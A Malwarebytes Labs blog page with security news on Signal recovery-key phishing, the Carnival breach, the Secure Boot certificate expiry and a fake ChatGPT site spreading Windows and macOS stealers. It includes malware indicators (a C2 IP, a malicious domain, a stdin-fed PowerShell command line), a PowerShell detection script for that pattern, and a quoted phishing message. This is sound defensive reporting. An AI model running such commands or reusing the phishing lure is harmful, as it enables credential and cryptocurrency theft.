Malware Bytes Security
Your phone called. It needs a cleanup.
Does it sometimes take your phone a few minutes to accomplish one simple task? That can be wildly frustrating.
But you’re in luck, because we’ve got a free tool that scans your phone for leftover files, temporary data, outdated caches and helps you clean up all that junk.
Introducing our Android Junk Cleaner. The new, free feature in our app clears out your unused files, helps protect your privacy, frees up valuable storage space, and improves your device’s performance.
Start cleaning up your phone now. Download the app and clear out your junk.
How to clean up your Android device
1. Open the Malwarebytes app on your Android device
2. On the Junk Cleaner card, tap Clean
If this is your first time using Junk Cleaner, you’ll need to grant permissions:
- Allow file access: Tap Give permission, then turn on Allow Malwarebytes to manage all files.
- Allow usage access: Tap Go to Settings. Under App usage data, tap Malwarebytes, then turn on Permit access to app usage data. If the toggle is grayed out, follow the on-screen instructions to enable access.
3. Return to the Junk Cleaner screen and tap Refresh
4. Tap Select all, then Clean all
Once the cleanup is complete, you’ll see an “All clean” screen showing how much storage space you freed up.
Prefer to remove files individually? Just select the files or folders you want to delete, then tap Clean.
Important: Once files are deleted with Junk Cleaner, they cannot be recovered using the Malwarebytes app.
Get started
Download Malwarebytes for Android and start cleaning up your device today.
Not a Malwarebytes user yet? No problem, it’s never too late to start. Whether you’re looking for yourself, your family, or a small business, we have a range of plans to choose from.
“One of the best cybersecurity suites on the planet.” According to CNET. Read their review →
A week in security (May 25 – May 31)
Last week on Malwarebytes Labs:
- Payment apps are watching what you say (Lock and Code S07E11)
- Scammers pretending to be Microsoft had help from US executives
- 700+ education and tech websites hijacked in huge ClickFix malware campaign
- Fake software on GitHub and SourceForge distribute Deno RAT
- Fake LinkedIn emails abuse Adobe to track victims
- Company bragged phone mics could listen to conversations. They couldn’t.
- Kali365 phishing kit bypasses MFA and steals Microsoft logins
- Fake ChatGPT download site infects Windows and Mac users with malware
- Your Windows PC has a security deadline in June 2026
- Carnival confirms data breach impacting nearly 6 million
- Signal users targeted in backup-stealing phishing attacks
Stay safe!
We don’t just report on threats—we remove them
Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.
Payment apps are watching what you say (Lock and Code S07E11)
This week on the Lock and Code podcast…
In the United States today, you can have your bank account closed, your credit cards cancelled, and your online payments revoked for any number of crimes, like funding terrorism, engaging in money laundering, or violating sanctions.
Sensible, right? Well, you can also face financial ruin for teaching poetry.
That’s what seemingly happened to a Persian poetry teacher from Detroit whose accounts were flagged for “sanctions violations” because his students wrote “Persian classes” in their Venmo memos. There’s also the story about the naked yoga practitioners who lost their payment processor for 60 days, forced to rebuild a subscriber list from scratch. And we can’t forget the San Diego cannabis journalist cut off from Stripe—and from a paid Substack newsletter—because of the payment platform’s rules that prohibit the promotion of the sale of cannabis.
This is “financial censorship,” and it often happens when a bank, credit card provider, or payment app decides that a customer is too risky to serve. But “risky” doesn’t always mean “illegal,” and when a major financial institution errs towards caution about what a customer is saying, advocating for, representing, or publishing, a lot of innocent people can be hurt in the process.
That’s what the digital rights activist Rainey Reitman learned in writing “Transaction Denied: Big Finance’s Power to Punish Speech.” As Reitman explained about these hugely impactful decisions:
“Even if they are well-intentioned, the financial systems can end up pulling in a lot of people that are not the actual target… Sometimes we talk about this as dolphins in the fishing lines.”
These decisions are difficult to fight, frustratingly opaque, and nearly impossible to reverse. Compounding the problem is that there aren’t enough alternatives available for the financially censored to easily regain their freedom.
The reality for hundreds of millions of people in this country is that about a dozen companies control all their finances. People mostly bank with Chase, or Bank of America, or Citigroup, or Wells Fargo. They mostly use credit cards assigned by Visa, MasterCard, American Express, or Capital One. And they mostly send money to one another and to small businesses using services like PayPal, Venmo, Cash App, and Square.
For most people, these companies are supposed to operate in the background of their lives, providing reliable, secure financing to sustain and manage their livelihoods. But in practice, these companies can become quite interested in what you say online, what payments you receive each month, and the locations those payments arrived from.
Today, on the Lock and Code podcast with host David Ruiz, we speak with Reitman—who is also the president and a co-founder of the Freedom of the Press Foundation—about the real stories of those who have been financially censored, why financial companies cut off customers for legal speech, and how a single company’s decision can create cascading consequences that feel impossible to fight.
“They’d be locked out of Venmo, then they’d be locked out of PayPal—which is connected to Venmo—and then they’d suddenly lose their Chase Bank account. You could see that in a lot of instances, losing one form of access to the financial system, it could result in a pattern where they would be losing access repeatedly.”
Tune in today to listen to the full conversation.
Show notes and credits:
Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
http://creativecommons.org/licenses/by/4.0/
Outro Music: “Good God” by Wowa (unminus.com)
Listen up—Malwarebytes doesn’t just talk cybersecurity, we provide it.
Protect yourself from online attacks that threaten your identity, your files, your system, and your financial well-being with our exclusive offer for Malwarebytes Premium Security for Lock and Code listeners.
Signal users targeted in backup-stealing phishing attacks
A new phishing campaign is targeting Signal users by attempting to steal their backup recovery keys to access encrypted message archives.
The attack is initiated by a text message pretending to come from Signal Support.
“Action Required: Data Recovery Needed
Your Signal account data (message and media) Is at risk of permanent loss due to a sync issue.
To avoid losing your messages and media:
1. Go to Settings -> Backups -> Configure -> Enable backups -> View Recovery Key.
2. Copy the recovery key to your clipboard.
3. Paste the key into this chat.
This links your existing backup to your account. Failure to do this may result in losing access to your account and all stored data.”
There are a few red flags in this message:
- The “Name not verified” label under the sender
- Repeated threats of losing all your data
- Pasting the key into the chat. Signal Support would never ask for your recovery key
The attack exploits Signal’s Secure Backups feature, which allows users to store encrypted archives of their conversations on Signal’s servers. These backups are protected by a 64-character recovery key.
That key should never leave the user’s device and is never shared with Signal’s servers. If hackers obtain this key and gain control of a victim’s account, they can download and decrypt the entire message history.
For an attacker, that’s even better than hijacking an account, which would only give them access to future messages.
For now, the attacks appear to be targeted. We have seen reports from journalists, reports of attacks on Chinese activists, and warnings from a researcher who investigates cyberattacks against journalists, dissidents, and human rights activists. But now that other cybercriminals are aware of this opportunity, the tactic could spread rapidly.
How to stay safe
Signal explicitly states that it will never reach out to users first and will never request registration codes, PINs, or recovery keys.
- Treat unsolicited messages from “Support” as suspicious by default. Legitimate support for apps like Signal and WhatsApp does not ask you, in a chat message, to send back verification codes, PINs, or passwords. If you receive a warning about account problems, do not follow links in the message. Open the app’s settings directly or visit the official website through other means.
- Never share any secret codes, multi-factor authentication keys, or app PINs. SMS codes are there to prove that you control a phone number. Anyone who has the code can pretend to be you. App‑specific PINs or passcodes are there to protect account changes. Consider anyone asking for them to be a scammer.
- Use the extra security features these apps offer. Enable options like registration lock, registration PIN and device‑change alerts so that your account cannot be silently re‑registered without an extra secret. Store your PIN in a password manager instead of choosing something easy to guess or reusing a code. This reduces the risk of social engineering or shoulder‑surfing.
- Another useful feature is disappearing messages. Short‑timer and disappearing messages reduce how much content is available if an attacker gains access to a chat later, or obtains long‑term access to a device or backup. They are not a complete solution, but they can limit the damage.
- Use Malwarebytes Scam Guard on your device or online to check messages. Malwarebytes Scam Guard identified this message as a phishing attempt and provided further information about how to proceed.
Scammers know more about you than you think.
Malwarebytes Mobile Security protects you from phishing, scam texts, malicious sites, and more. With real-time AI-powered Scam Guard built right in.
Carnival confirms data breach impacting nearly 6 million
Carnival Corporation, parent of Carnival Cruise Line, is sending out fresh “Notice of Cybersecurity Event” letters dated May 27, 2026. If you feel like you’ve read that sentence before, you’re not imagining things. Over the last decade, the world’s largest cruise operator has accumulated a worrying track record of breaches, ransomware incidents, and regulatory penalties, with this 2026 incident adding yet another entry to an already lengthy cybersecurity history.
There are several data breaches involving Carnival Corporation or one of its subsidiaries in our database.
Between 2019 and 2021 alone, Carnival reported four separate cybersecurity events to the New York Department of Financial Services. These included two ransomware attacks and a phishing incident in which attackers deployed malware, accessed and encrypted internal systems, and stole personal customer and employee information.
In this latest case, an attacker used social engineering to trick a Carnival employee into granting access to part of the company’s IT systems on April 14, 2026. By April 22, they used a compromised account to access a “limited portion” of Carnival’s IT systems, where they were able to copy personal data before being blocked.
According to the data breach notice filed in Maine, a total of 5,995,277 people were affected. Carnival determined that the intruder had illegally copied files containing personal information and is now writing to affected individuals to tell them that “data elements” relating to them were obtained.
Researchers cited by Gblock say the stolen data appears to include:
- Full names
- Email addresses
- Dates of birth
- Genders
- Mariner Society membership status and tier
- Internal customer identifiers
The template letter does not list specific data fields. Instead, it uses a placeholder:
“We have determined that your <<data elements>> were obtained.”
This strongly suggests that Carnival is populating each letter with data categories relevant to that particular individual, a common pattern in large breaches where people may have provided different information at different times.
Furthermore, the letters contain the usual content about the speed with which the company acted, involving third‑party experts, and frame the affected systems as a limited subset of the environment. For recipients, the important fact is not how limited the breach was from the company’s point of view, but whether the exposed information could be used for identity theft, fraud, or highly convincing phishing attacks.
Breaches happen every day. Don’t be the last to know.
We do know from past Carnival incidents that exposed data has included names, addresses, dates of birth, passport numbers, health information, and payment details. In previous breaches affecting cruise lines, compromised data has ranged from basic contact details to Social Security numbers and credit card information. Carnival has not publicly disclosed the full categories of data involved in the 2026 incident, but given that this 2026 event again involves “personal information” copied from internal systems, it is reasonable to treat it as a serious privacy incident, even if the exact mix of data varies per person.
The attack was claimed by extortion group ShinyHunters, which is known to steal data and then ask for a ransom. If the victim does not agree to the terms, the data will be published and/or sold to the highest bidder.
ShinyHunters offers Carnival data for download
From a cybercriminal’s perspective, cruise industry data is highly prized. Cruise passengers are often relatively wealthy, and passenger records can combine identity data (names, addresses, dates of birth, passport numbers), contact data (emails, phone numbers), and potentially payment data (card numbers and sometimes bank details), making them valuable for identity theft, targeted phishing, and fraud.
What to do if you’re affected
To mitigate the fallout, Carnival is offering a complimentary 24‑month TransUnion credit‑monitoring package, delivered via the MyTrueIdentity platform and supported by Cyberscout for fraud assistance.
Be cautious of emails, texts, or calls claiming to come from Carnival or credit-monitoring providers, as cybercriminals often exploit breaches with phishing scams. Read our advice on what to do when you find out you’re involved in a data breach.
What do cybercriminals know about you?
Use Malwarebytes’ free Digital Footprint scan to see whether your personal information has been exposed online.
Your Windows PC has a security deadline in June 2026
A Secure Boot certificate refresh is rolling out across supported Windows devices through Windows Update. In June 2026, the Secure Boot certificates that have shipped inside Windows since 2011 begin to expire, and Microsoft is replacing them with new 2023-dated certificates.
The good news: If you keep your PC updated, you probably won’t need to do anything. The bad news: Some older devices may not transition cleanly. Your PC won’t suddenly stop working, but over time it could miss important boot-level security protections without you realizing it.
Here’s what’s going on, why it matters, and how to check that your machine is on the right side of the deadline.
What is Secure Boot, and what’s expiring?
Secure Boot is a UEFI firmware feature built into virtually every PC sold since around 2012. It runs before Windows even starts loading, and its job is to verify that the boot loader and early boot components have been signed by a trusted party. If something tries to insert itself into the boot chain that isn’t on the trust list—a bootkit, for example—Secure Boot refuses to let it run.
The “trusted party” part is the crucial bit. Trust is established through cryptographic certificates baked into your motherboard firmware. The current certificates were issued in 2011 and are now reaching expiration. Three specific certificates are involved:
- Microsoft Corporation KEK CA 2011: expires June 24, 2026
- Microsoft UEFI CA 2011: expires June 27, 2026
- Microsoft Windows Production PCA 2011: expires October 19, 2026
Microsoft is replacing them with a 2023-dated set, including Windows UEFI CA 2023 and Microsoft Corporation KEK 2K CA 2023. According to Microsoft engineers speaking during a March 2026 AMA session, the new certificates are valid until 2038, and a separate post-quantum cryptography transition is planned for around 2030 for future hardware.
“Will my computer stop working?”
No. This is the single most important thing to understand, because the rumor mill has been louder than the facts.
If the deadline arrives and your PC is still running on the 2011 certificates, Windows will still boot, Windows Update will still work, and your PC will continue functioning normally.
What changes is that, in Microsoft’s own words, the device “will no longer be able to receive new security protections” for the early boot process, including updates to Windows Boot Manager, Secure Boot databases, revocation lists, and mitigations for newly discovered boot-level vulnerabilities.
In plain English: Your PC becomes harder to protect over time. It’s protected against today’s known boot threats, but not necessarily against the ones that will be discovered next month or next year.
That’s a problem because bootkits operate underneath Windows and antivirus software. They run before anything else and can disable the security tools that would normally catch them.
The BlackLotus problem
If you want a concrete example of why boot-level security matters, look at BlackLotus.
BlackLotus is a UEFI bootkit that emerged on hacking forums in 2022 and was confirmed in the wild by researchers in early 2023. It exploited CVE-2022-21894, nicknamed “Baton Drop,” to bypass Secure Boot on fully patched Windows systems. Once installed, it could disable BitLocker, Hypervisor-Protected Code Integrity (HVCI), and Microsoft Defender before Windows fully loaded.
Microsoft addressed the underlying flaw in CVE-2023-24932, but fixing vulnerable boot managers safely is complicated. Revoking the wrong boot components can leave systems unbootable, which is why Microsoft has rolled out protections gradually over several years.
The 2026 certificate rollover is a planned lifecycle event (the 2011 certificates were always going to expire), but it also enables the broader Secure Boot hardening Microsoft has been doing in response to vulnerable boot managers and attacks such as BlackLotus.
With the new trust anchors in place, Microsoft can continue rolling out newer 2023-signed boot components and safely revoke vulnerable ones as new threats emerge. Devices that don’t make the transition may eventually miss those future protections.
How the rollout works
Microsoft is using a staged rollout designed to avoid breaking systems.
A scheduled Windows task runs roughly every 12 hours and applies the update in stages:
- Add the new Windows UEFI CA 2023 to the firmware’s signature database.
- If the old 2011 third-party certificate is still present, add the Microsoft UEFI CA 2023 and Microsoft Option ROM UEFI CA 2023 alongside it.
- Add the new Microsoft Corporation KEK 2K CA 2023 key.
- Update the Windows Boot Manager to one signed by the new certificate. This step is deferred until the next natural reboot.
Microsoft’s IT pro guidance estimates the full process takes roughly 48 hours and one or more restarts to complete. Each step must succeed before the next one runs, so a device can sit partway through the sequence for a while if (for example) it’s waiting on a firmware update or a scheduled reboot.
For most home users, this happens silently in the background through normal cumulative updates.
Starting with the April 2026 Windows update, the Windows Security app includes updated Secure Boot status information under Device security that shows whether the new certificates have been applied successfully.
What could go wrong
Most systems will transition without problems, but there are some known trouble spots:
- Older PCs with outdated firmware. Some older UEFI firmware implementations don’t properly support the new certificates. These systems may require a BIOS or firmware update from the manufacturer before the transition can complete.
- PCs that bypassed Windows 11 requirements. If Secure Boot was disabled to install Windows 11 using unofficial workarounds, the new certificates cannot be applied correctly.
- Legacy BIOS / CSM systems. Devices running Legacy BIOS (or UEFI with Compatibility Support Module enabled) aren’t using Secure Boot at all, so they’re outside the scope of this update entirely.
- Custom firmware and weird configurations. Some custom or unusual firmware configurations may trigger a BitLocker recovery prompt after the Secure Boot variables change. Microsoft has been careful to note that BitLocker itself is not being disabled, but users should have their recovery keys handy just in case.
Windows Latest reported seeing update failures on thousands of PCs with outdated firmware during testing. Microsoft’s own guidance more broadly warns that firmware, platform, and OEM limitations can block the transition. In many cases, Windows Security will flag affected systems with yellow or red status warnings.
What home users should do
For most people, the advice is straightforward:
- Keep Windows fully up to date. Microsoft is rolling the new certificates out through normal Windows updates, and most home users won’t need to do anything beyond installing monthly updates.
- Check your Secure Boot status (the text, not just the color). Open Windows Security > Device security > Secure Boot. A green badge with the text “Secure Boot is on, preventing malicious software from loading when your device starts up.” is the all-clear. Microsoft warns that a green checkmark alone doesn’t confirm the new certificates have been applied.
- If your device is older, check for a BIOS/firmware update from your manufacturer. Some systems need them before the Secure Boot update can complete properly. This is especially important for PCs built before 2024.
- Don’t disable Secure Boot to “fix” something. Disabling Secure Boot is exactly the wrong response—it removes the protection entirely rather than updating it. Some game anti-cheat systems and older apps ask users to do this.
- Don’t panic about the new SecureBoot folder. Windows 11’s May 2026 cumulative update (KB5089549) creates a folder at C:\Windows\SecureBoot containing example PowerShell scripts intended for IT administrators. It’s not malware, it’s expected, and you don’t need to delete it.
- Use up-to-date, real-time anti-malware protection that can detect threats at the OS level even if something does slip past Secure Boot.
If you manage a fleet, Microsoft has published extensive guidance and the work is more involved. The short version:
- Inventory your devices now. Pull the manufacturer, model, BIOS version and date, baseboard product, and Secure Boot status across the fleet. Microsoft provides a PowerShell sample script at aka.ms/GetSecureBoot that surfaces the relevant registry keys and event IDs.
- Watch Event IDs 1801 and 1808. Event ID 1808 confirms the new certificates are in place. Event ID 1801 means the device has not completed the update.
- Test before broad rollout. Microsoft recommends testing at least four devices per unique manufacturer/model/firmware combination. Some systems may need an OEM firmware update before they can accept the new certificates.
- Choose one deployment method per device. Use registry keys, Group Policy, WinCS command-line tools, or Intune/ConfigMgr scripts, but don’t mix methods on the same machine.
- Pay attention to PXE imaging and Hyper-V. SCCM/MECM PXE servers may need a re-signed boot.wim, and Hyper-V hosts may need updating before new VMs are created with the 2023 KEK in the firmware template.
- Document devices that can’t be updated. Older hardware without OEM firmware support may need to be replaced before the deadline or formally accepted as an exception with compensating controls. These devices will keep working, but they may miss future boot-level protections.
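The rollout stages and the checks above (db entries, KEK entry, Event IDs 1801/1808) can be gathered from one machine in a few lines. The following PowerShell is an added example, not Microsoft’s aka.ms/GetSecureBoot sample and not part of this article. It assumes an elevated session on a UEFI system and uses only the built-in SecureBoot cmdlets (`Confirm-SecureBootUEFI`, `Get-SecureBootUEFI`) plus `Get-WinEvent`; the function name, field names and verdict strings are this example’s own. It reads the actual contents of the db and KEK variables rather than relying on the Windows Security badge, which is the distinction Microsoft warns about.

```powershell
# Added example, not Microsoft's aka.ms/GetSecureBoot script: summarise where the
# local machine stands in the 2023 certificate rollover. Assumes an elevated
# PowerShell session on a UEFI system; the SecureBoot cmdlets ship with Windows.

function Get-SecureBootRolloverStatus {
    [CmdletBinding()]
    param()

    $status = [ordered]@{
        SecureBootEnabled        = $false
        DbHasWindowsUefiCa2023   = $false   # rollout step 1
        DbHasMicrosoftUefiCa2023 = $false   # rollout step 2 (only present if a 2011 third-party CA was)
        KekHasKek2KCa2023        = $false   # rollout step 3
        Event1808Seen            = $false   # new certificates in place
        Event1801Seen            = $false   # update not yet completed
        Verdict                  = ''
    }

    try {
        # Throws on Legacy BIOS / CSM machines, which have no Secure Boot to update.
        $status.SecureBootEnabled = Confirm-SecureBootUEFI -ErrorAction Stop
    } catch {
        $status.Verdict = 'No UEFI Secure Boot on this machine; the rollover does not apply'
        return [pscustomobject]$status
    }

    # db and KEK are raw UEFI variable blobs holding DER-encoded certificates. The
    # subject names are stored as printable ASCII inside the blob, so a plain
    # substring match on the CA names is enough to see which ones are present.
    $db  = [System.Text.Encoding]::ASCII.GetString((Get-SecureBootUEFI -Name db).bytes)
    $kek = [System.Text.Encoding]::ASCII.GetString((Get-SecureBootUEFI -Name KEK).bytes)
    $status.DbHasWindowsUefiCa2023   = [bool]($db  -match 'Windows UEFI CA 2023')
    $status.DbHasMicrosoftUefiCa2023 = [bool]($db  -match 'Microsoft UEFI CA 2023')
    $status.KekHasKek2KCa2023        = [bool]($kek -match 'Microsoft Corporation KEK 2K CA 2023')

    # Event IDs 1801 (not done) and 1808 (done) are filtered by ID only; the
    # provider name is not given in the article, so none is assumed here.
    $events = Get-WinEvent -FilterHashtable @{ LogName = 'System'; Id = 1801, 1808 } -ErrorAction SilentlyContinue
    $status.Event1808Seen = [bool]($events | Where-Object Id -eq 1808)
    $status.Event1801Seen = [bool]($events | Where-Object Id -eq 1801)

    $status.Verdict = if (-not $status.SecureBootEnabled) {
        'Secure Boot is off; re-enable it in firmware rather than waiting for the update'
    } elseif ($status.DbHasWindowsUefiCa2023 -and $status.KekHasKek2KCa2023) {
        '2023 CA and KEK present; confirm the boot manager step after the next reboot'
    } else {
        'Still on the 2011 trust anchors: waiting on the scheduled task, a firmware update, or a reboot'
    }

    [pscustomobject]$status
}

# Show the summary for this machine. Across a fleet, pipe the object to
# Export-Csv so every device reports the same fields for the inventory step.
Get-SecureBootRolloverStatus | Format-List
```

A device that shows `SecureBootEnabled` true but neither 2023 entry, with Event ID 1801 logged and no 1808, is the “stuck partway” case described above; that is where the firmware-version check against the OEM’s support page comes in. The boot manager replacement (step 4) is not inspected here because it only lands after a reboot and its location is not something this article documents.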
This is one of those security events that won’t generate a dramatic incident on June 24, 2026. Nothing visible will break that day.
The risk is what happens in the months and years after. Devices that fail to transition to the new trust chain may slowly fall behind on future boot-level protections as Microsoft continues responding to threats like BlackLotus and other bootkits.
For most home users, Windows Update will handle the transition automatically. Your main job is to keep your system updated and verify Secure Boot status before the deadlines arrive.
If your hardware is older, now is a good time to check whether your manufacturer still provides firmware updates—and whether your PC is ready for the next decade of Secure Boot protections.
Fake ChatGPT download site infects Windows and Mac users with malware
A convincing fake website is impersonating OpenAI’s ChatGPT download page and infecting visitors with malware designed to steal passwords, browser data, cryptocurrency wallets, and other sensitive information.
The site, openew[.]app, closely mimics OpenAI’s real ChatGPT download experience and offers what appear to be official desktop apps for both Windows and macOS. Instead, Windows users receive a credential-stealing malware loader, while Mac users get Atomic Stealer (AMOS), a well-known macOS malware family associated with cryptocurrency theft.
The dual-platform setup is what makes the operation notable. Clicking the Windows download delivers a fake installer that opens a back channel to an attacker-controlled server. Clicking the macOS button delivers malware that steals browser passwords, cookies, Telegram sessions, cryptocurrency wallets, and other sensitive files. It also attempts to replace legitimate Ledger and Trezor wallet apps with trojanized versions.
If you only download ChatGPT from OpenAI’s official download page or the Microsoft Store, you were not the target here. But if you searched for “ChatGPT download” and clicked an ad or unfamiliar result, you may have given attackers access to your online accounts, browser sessions, saved passwords, and potentially your cryptocurrency holdings.
Technical analysis
The domain, openew[.]app, closely resembles OpenAI’s real ChatGPT download experience. It uses a dark theme, OpenAI-style branding, familiar marketing copy, and prominent download buttons for macOS and Windows.
The .app top-level domain is operated by Google and requires HTTPS connections, meaning browsers display the familiar padlock icon without obvious certificate warnings.
The most important detail is the dual-platform setup. Real software vendors provide separate installers for Windows and macOS, and this fake site does exactly the same thing.
Clicking the Windows button delivers Chat_GPT.exe, while clicking the macOS button downloads a disk image containing ChatGpt.dmg.
The Windows malware
Chat_GPT.exe is built almost entirely from off-the-shelf parts. The installer uses Inno Setup, a free open-source toolkit used by thousands of legitimate Windows products. Inside is an Electron application skeleton—the same Chromium-based framework used by apps like Slack and Discord—bundled with standard support libraries publicly available from the Electron project.
When the victim runs the installer, it creates files under %APPDATA%\LeronApplication, launches EApp.exe, and spawns PowerShell with the flags -ExecutionPolicy Unrestricted -Command -. The trailing dash tells PowerShell to read commands from standard input, meaning the malicious instructions never touch the disk where scanners might detect them. Behavioral telemetry recorded HTTP traffic to 188.137.246.189 using a /laravel.php?api=api&hash=...&message=... endpoint, alongside injection-like activity and service/autorun persistence signals. Nine of 69 antivirus engines flagged the file as malicious at the time of analysis. The persistence evidence is better read as behavioral tradecraft than proof of a durable install, but the overall pattern is familiar commodity stealer/dropper territory: cheap, modular, and effective rather than technically novel.
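The stdin-fed PowerShell launch described above leaves a usable trace in process-creation telemetry even though the script body never touches disk. As an added example that is not part of the Malwarebytes analysis, the PowerShell below scores process records for that pattern. The three records are constructed to resemble Sysmon Event ID 1 / Security 4688 fields; only the `LeronApplication` path, `EApp.exe` name and the `-ExecutionPolicy Unrestricted -Command -` flags come from the article, the other paths and the two-reason threshold are this example’s own choices.

```powershell
# Added example (not from the article): flag PowerShell launches that match the
# "-Command -" (script read from standard input) pattern. The event records are
# constructed for the demo and are not real telemetry.

$SampleProcessEvents = @(
    # Mirrors the chain in the article: EApp.exe under %APPDATA% spawning PowerShell
    [pscustomobject]@{
        ParentImage = 'C:\Users\alice\AppData\Roaming\LeronApplication\EApp.exe'
        Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        CommandLine = 'powershell.exe -ExecutionPolicy Unrestricted -Command -'
    }
    # Benign: a scheduled script launched by the shell (constructed)
    [pscustomobject]@{
        ParentImage = 'C:\Windows\explorer.exe'
        Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        CommandLine = 'powershell.exe -NoProfile -ExecutionPolicy RemoteSigned -File C:\Scripts\nightly-backup.ps1'
    }
    # Noisy-but-common: management agent relaxing the policy for an on-disk script (constructed)
    [pscustomobject]@{
        ParentImage = 'C:\Windows\CCM\CcmExec.exe'
        Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        CommandLine = 'powershell.exe -ExecutionPolicy Bypass -File C:\Windows\ccmcache\a1\deploy.ps1'
    }
)

function Test-StdinPowerShellLaunch {
    [CmdletBinding()]
    param([Parameter(Mandatory, ValueFromPipeline)] [pscustomobject] $Event)
    process {
        $cmd     = $Event.CommandLine
        $reasons = [System.Collections.Generic.List[string]]::new()

        # A lone "-" after -Command (or its -c alias) makes PowerShell read the
        # script from stdin, so on-access scanners never see a file.
        if ($cmd -match '(?i)(^|\s)-(Command|c)\s+-(\s|$)') {
            $reasons.Add('script body fed via stdin (-Command -)')
        }
        # Relaxed execution policy on the command line; common in admin tooling too,
        # which is why it only counts as one reason.
        if ($cmd -match '(?i)-ExecutionPolicy\s+(Unrestricted|Bypass)') {
            $reasons.Add('execution policy relaxed on the command line')
        }
        # A PowerShell host living under %APPDATA% is unusual for managed software.
        if ($Event.ParentImage -match '(?i)\\AppData\\Roaming\\') {
            $reasons.Add('parent process runs from %APPDATA%')
        }

        [pscustomobject]@{
            Parent     = Split-Path $Event.ParentImage -Leaf
            Score      = $reasons.Count
            Suspicious = ($reasons.Count -ge 2)   # threshold is a design choice for this demo
            Reasons    = ($reasons -join '; ')
        }
    }
}

# Only the first record reaches the threshold (all three reasons); the ConfigMgr
# record scores one and stays below it.
$SampleProcessEvents | Test-StdinPowerShellLaunch | Format-Table -AutoSize
```

Scoring rather than alerting on any single flag keeps the rule usable: `-ExecutionPolicy Bypass` alone fires constantly in managed environments, but it combined with a stdin-fed command line and a parent under a user-writable profile directory is the shape this installer produces.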
The macOS payload sits at the premium end of the commodity-malware market. It’s Atomic Stealer, also known as AMOS, a malware-as-a-service platform documented since 2023, including in our 2024 coverage of an updated version.
The identification is fairly clear-cut. The sandboxed sample matches well-known AMOS behavior patterns: a long AppleScript chain passed to the macOS scripting engine, a silent password validation attempt using macOS directory-service commands, and—if that silent check fails—a fake macOS-style prompt reading “Please enter device password to continue,” complete with the familiar lock icon. Whatever the user types is validated against the same command. If it matches, the malware captures the user’s login password in cleartext.
From there, it follows a familiar AMOS playbook. It copies the macOS keychain, harvests cookies and saved logins from 12 Chromium-based browsers plus Firefox and Waterfox, and extracts Telegram session data. It also scans 16 cryptocurrency wallet directories, including Ledger Live, Trezor Suite, Exodus, Electrum, and Sparrow. Finally, it searches Desktop and Documents folders for files with extensions like .wallet, .seed, .key, and .kdbx. The collected data is compressed into a temporary archive and sent to a hardcoded server.
The wallet replacement feature is especially dangerous
There’s one more part of the macOS payload, and it’s likely the feature that justifies the price tag. After the initial data theft, the script downloads trojanized versions of Ledger Live, Ledger Wallet, and Trezor Suite from a second server. It then attempts to delete the legitimate wallet apps and replace them with the attacker’s versions.
If the user’s password was captured earlier in the attack chain, the script uses sudo to force the replacement. If not, it falls back to a standard rm -rf deletion attempt, which can still succeed if the apps are installed in a user-writable location. Either way, the next time the victim opens what appears to be their wallet software, they may actually be launching the attacker’s replacement.
This behavior has been documented in previous public AMOS analyses and makes the operator’s intent fairly clear. AMOS is heavily associated with cryptocurrency theft, and the macOS side of this campaign appears focused on exactly that outcome.
What the operation cost to build
This is where the AI angle becomes interesting, because the Windows and macOS sides of the operation sit at very different price points.
The domain openew.app probably cost the operators around $15 a year through a normal registrar. The .app domain requires HTTPS by default, making it easy for operators to present the reassuring browser padlock users associate with legitimate websites. The landing page itself is simply a copy of OpenAI’s real download page, something modern cloning tools can reproduce in minutes.
On the Windows side, most of the tools are cheap or free. Inno Setup is free. Electron is free. The Chromium support files are public downloads. The server infrastructure appears to rely on low-cost commodity malware tooling and a basic VPS that could cost only a few dollars a month. Altogether, the Windows side of this operation could plausibly have cost under $100 to set up initially.
The macOS side is very different. AMOS has reportedly rented for around $3,000 per month, paid in cryptocurrency. By comparison, Lumma—a popular Windows infostealer often treated as a similar product—has historically advertised entry tiers around $250 per month.
That price gap says a lot. The operators clearly believe a successful Mac infection is worth much more money than a typical Windows infection.
The likely reason is simple: AMOS is designed specifically for cryptocurrency theft, including the wallet-replacement behavior seen in this campaign. The operators are betting that a meaningful number of Mac users hold cryptocurrency.
Getting victims to the site is probably the only major ongoing cost, and that’s where the AI branding becomes valuable. Search ads, SEO poisoning, YouTube spam, and links shared in AI-focused Discord and Telegram communities can all drive traffic to fake download pages. Some of those channels cost money. Others are almost free.
Why attackers are going after AI brands
Most established software already has trusted download habits built around it. If you want Chrome, you probably know to go to Google. If you want Photoshop, you go to Adobe. People already know where the real download lives.
AI tools are different because most users are still installing them for the first time, and that means relying on search results, ads, YouTube links, or social posts to find the download page. That creates an ideal environment for fake sites.
Over the last two years, products like ChatGPT, Claude, Gemini, Sora, DeepSeek, Antigravity, and many others have launched or changed rapidly. Every new release creates another wave of users searching for “download ChatGPT” or “install Claude” without knowing the official URL. That search traffic is exactly where attackers set up shop.
The fake pages also do not need to be especially sophisticated because legitimate AI product pages are already minimal by design: a modern layout, a logo, and a large download button. Openew[.]app matches what users expect to see. There is no broken English or aggressive pop-ups here, just identical branding, copy, and the reassuring browser padlock.
What makes this kind of operation durable is how easily it can rotate brands. When the ChatGPT lure stops attracting clicks, the operators can reuse the same infrastructure around the next trending AI product. The malware behind the download button stays the same. Only the branding changes.
What AI vendors could do
Most major AI vendors, including OpenAI, already provide official download channels. The problem is visibility and user habit. Many users still search for “ChatGPT download,” where results can include official links, unofficial mirrors, and outright malicious sites.
Large consumer brands and banks often run aggressive brand-protection campaigns against fake ads and impersonation domains. AI vendors may need to do the same more consistently.
The other issue is discoverability. Official desktop-app links are often buried in settings menus or sidebars, while search engines are faster and more obvious. That’s exactly where the fake download sites are waiting.
What to do if you may have installed the fake app
If you recently installed something claiming to be ChatGPT from anywhere other than OpenAI’s official download page or the Microsoft Store, you may have been affected. From a different, clean device:
- Sign out of your important accounts using each service’s “sign out everywhere” option. This includes email, banking, cloud storage, GitHub, Discord, Telegram, and cryptocurrency exchanges.
- Change passwords starting with your primary email account.
- Rotate any API keys, SSH keys, and cloud credentials stored on the affected machine.
- If you hold cryptocurrency, move funds immediately using a separate clean device. On macOS specifically, do not open Ledger Live or Trezor Suite on the affected machine before reinstalling the operating system, as the wallet-replacement function may have succeeded.
- Monitor bank accounts and payment cards for suspicious activity.
